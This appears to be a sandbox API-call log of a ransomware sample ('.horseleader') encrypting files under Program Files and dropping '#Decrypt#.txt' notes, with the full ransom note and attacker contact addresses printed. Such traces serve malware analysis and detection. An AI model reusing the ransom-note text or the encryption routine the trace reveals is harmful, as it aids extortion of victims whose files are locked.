\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0233.947] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0233.998] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0233.998] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0233.998] CloseHandle (hObject=0x158) returned 1 [0233.998] 
GetProcessHeap () returned 0x780000 [0233.998] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0233.998] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2ece8572, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2ece8572, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2ea60e45, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb620, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrcommonlm.dat", cAlternateFileName="")) returned 1 [0233.998] lstrcmpiW (lpString1="hwrcommonlm.dat", lpString2="Windows") returned -1 [0233.998] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat") returned 70 [0233.998] StrStrIW (lpFirst="hwrcommonlm.dat", lpSrch=".horseleader") returned 0x0 [0233.998] lstrcmpW (lpString1="hwrcommonlm.dat", lpString2="#Decrypt#.txt") returned 1 [0233.999] lstrcmpW (lpString1="hwrcommonlm.dat", lpString2="_uninstalling_.png") returned 1 [0233.999] lstrlenW (lpString=".testttjffg") returned 11 [0233.999] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat", lpSrch=".testttjffg") returned 0x0 [0233.999] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0233.999] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0233.999] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrcommonlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcommonlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 
lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0233.999] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0233.999] lstrcmpiW (lpString1="HWRCustomization", lpString2="Windows") returned -1 [0233.999] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization") returned 71 [0233.999] lstrcmpW (lpString1="HWRCustomization", lpString2=".") returned 1 [0233.999] lstrcmpW (lpString1="HWRCustomization", lpString2="..") returned 1 [0233.999] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0233.999] GetProcessHeap () returned 0x780000 [0233.999] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0233.999] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*") returned 73 [0234.000] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\*", lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, 
ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName=".", cAlternateFileName="")) returned 0x7c6760 [0234.006] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0234.006] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\.") returned 73 [0234.006] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0234.006] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 1 [0234.006] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0234.007] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\..") returned 74 [0234.007] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0234.007] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0234.007] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e0df36a, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaabda5f8, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x9e0df36a, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="..", cAlternateFileName="")) returned 0 [0234.007] FindClose (in: 
hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0234.007] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\#Decrypt#.txt") returned 85 [0234.007] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\HWRCustomization\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrcustomization\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0234.008] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0234.008] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32aeb98*=0x5e4, lpOverlapped=0x0) returned 1 [0234.009] lstrlenA (lpString="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") returned 1368 [0234.009] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32aeb98, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32aeb98*=0x558, lpOverlapped=0x0) returned 1 [0234.009] CloseHandle (hObject=0x158) returned 1 [0234.009] GetProcessHeap () returned 0x780000 [0234.009] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0234.010] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f7eaa54, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x2f7eaa54, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x2f301d57, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xb6710, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrenalm.dat", cAlternateFileName="")) returned 1 [0234.010] lstrcmpiW (lpString1="hwrenalm.dat", lpString2="Windows") returned -1 [0234.010] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat") returned 67 [0234.010] StrStrIW (lpFirst="hwrenalm.dat", lpSrch=".horseleader") returned 0x0 [0234.010] lstrcmpW (lpString1="hwrenalm.dat", 
lpString2="#Decrypt#.txt") returned 1 [0234.010] lstrcmpW (lpString1="hwrenalm.dat", lpString2="_uninstalling_.png") returned 1 [0234.010] lstrlenW (lpString=".testttjffg") returned 11 [0234.010] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat", lpSrch=".testttjffg") returned 0x0 [0234.011] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.011] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.011] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.022] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x33535c00, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x33535c00, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x332fa78d, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0xc7240, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrenclm.dat", cAlternateFileName="")) returned 1 [0234.022] lstrcmpiW (lpString1="hwrenclm.dat", lpString2="Windows") returned -1 [0234.023] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat") returned 67 [0234.023] StrStrIW (lpFirst="hwrenclm.dat", lpSrch=".horseleader") returned 0x0 [0234.023] lstrcmpW (lpString1="hwrenclm.dat", lpString2="#Decrypt#.txt") returned 1 [0234.023] lstrcmpW 
(lpString1="hwrenclm.dat", lpString2="_uninstalling_.png") returned 1 [0234.023] lstrlenW (lpString=".testttjffg") returned 11 [0234.023] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat", lpSrch=".testttjffg") returned 0x0 [0234.023] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.023] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.023] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrenclm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrenclm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.023] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32bd661d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x32bd661d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x32a7f9d8, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x10ca50, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrlatinlm.dat", cAlternateFileName="")) returned 1 [0234.023] lstrcmpiW (lpString1="hwrlatinlm.dat", lpString2="Windows") returned -1 [0234.023] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat") returned 69 [0234.023] StrStrIW (lpFirst="hwrlatinlm.dat", lpSrch=".horseleader") returned 0x0 [0234.024] lstrcmpW (lpString1="hwrlatinlm.dat", lpString2="#Decrypt#.txt") returned 1 [0234.024] lstrcmpW (lpString1="hwrlatinlm.dat", 
lpString2="_uninstalling_.png") returned 1 [0234.024] lstrlenW (lpString=".testttjffg") returned 11 [0234.024] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat", lpSrch=".testttjffg") returned 0x0 [0234.024] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.024] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.024] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrlatinlm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrlatinlm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.024] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3d94dbb3, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3d94dbb3, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3c28ab1e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x2e99a0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwruklm.dat", cAlternateFileName="")) returned 1 [0234.024] lstrcmpiW (lpString1="hwruklm.dat", lpString2="Windows") returned -1 [0234.024] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat") returned 66 [0234.024] StrStrIW (lpFirst="hwruklm.dat", lpSrch=".horseleader") returned 0x0 [0234.024] lstrcmpW (lpString1="hwruklm.dat", lpString2="#Decrypt#.txt") returned 1 [0234.024] lstrcmpW (lpString1="hwruklm.dat", lpString2="_uninstalling_.png") returned 1 [0234.024] lstrlenW 
(lpString=".testttjffg") returned 11 [0234.024] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat", lpSrch=".testttjffg") returned 0x0 [0234.024] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.024] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.025] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruklm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruklm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.033] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3da5853e, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3da5853e, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d7f6f6e, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x21ff00, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwruksh.dat", cAlternateFileName="")) returned 1 [0234.033] lstrcmpiW (lpString1="hwruksh.dat", lpString2="Windows") returned -1 [0234.033] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat") returned 66 [0234.033] StrStrIW (lpFirst="hwruksh.dat", lpSrch=".horseleader") returned 0x0 [0234.033] lstrcmpW (lpString1="hwruksh.dat", lpString2="#Decrypt#.txt") returned 1 [0234.033] lstrcmpW (lpString1="hwruksh.dat", lpString2="_uninstalling_.png") returned 1 [0234.033] lstrlenW (lpString=".testttjffg") returned 11 [0234.033] StrStrW 
(lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat", lpSrch=".testttjffg") returned 0x0 [0234.033] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.034] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwruksh.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwruksh.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.034] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3db89026, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3db89026, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3d3cc942, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x30c330, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrusalm.dat", cAlternateFileName="")) returned 1 [0234.034] lstrcmpiW (lpString1="hwrusalm.dat", lpString2="Windows") returned -1 [0234.034] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat") returned 67 [0234.034] StrStrIW (lpFirst="hwrusalm.dat", lpSrch=".horseleader") returned 0x0 [0234.034] lstrcmpW (lpString1="hwrusalm.dat", lpString2="#Decrypt#.txt") returned 1 [0234.034] lstrcmpW (lpString1="hwrusalm.dat", lpString2="_uninstalling_.png") returned 1 [0234.034] lstrlenW (lpString=".testttjffg") returned 11 [0234.034] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft 
Shared\\ink\\hwrusalm.dat", lpSrch=".testttjffg") returned 0x0 [0234.034] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0234.034] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0234.034] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusalm.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusalm.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0234.152] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3dbfb43d, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x3dbfb43d, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x3da7e69b, ftLastWriteTime.dwHighDateTime=0x1ca03fa, nFileSizeHigh=0x0, nFileSizeLow=0x3ee0d0, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="hwrusash.dat", cAlternateFileName="")) returned 1 [0234.152] lstrcmpiW (lpString1="hwrusash.dat", lpString2="Windows") returned -1 [0234.152] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat") returned 67 [0234.152] StrStrIW (lpFirst="hwrusash.dat", lpSrch=".horseleader") returned 0x0 [0234.152] lstrcmpW (lpString1="hwrusash.dat", lpString2="#Decrypt#.txt") returned 1 [0234.152] lstrcmpW (lpString1="hwrusash.dat", lpString2="_uninstalling_.png") returned 1 [0234.152] lstrlenW (lpString=".testttjffg") returned 11 [0234.152] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\hwrusash.dat", lpSrch=".testttjffg") returned 0x0 
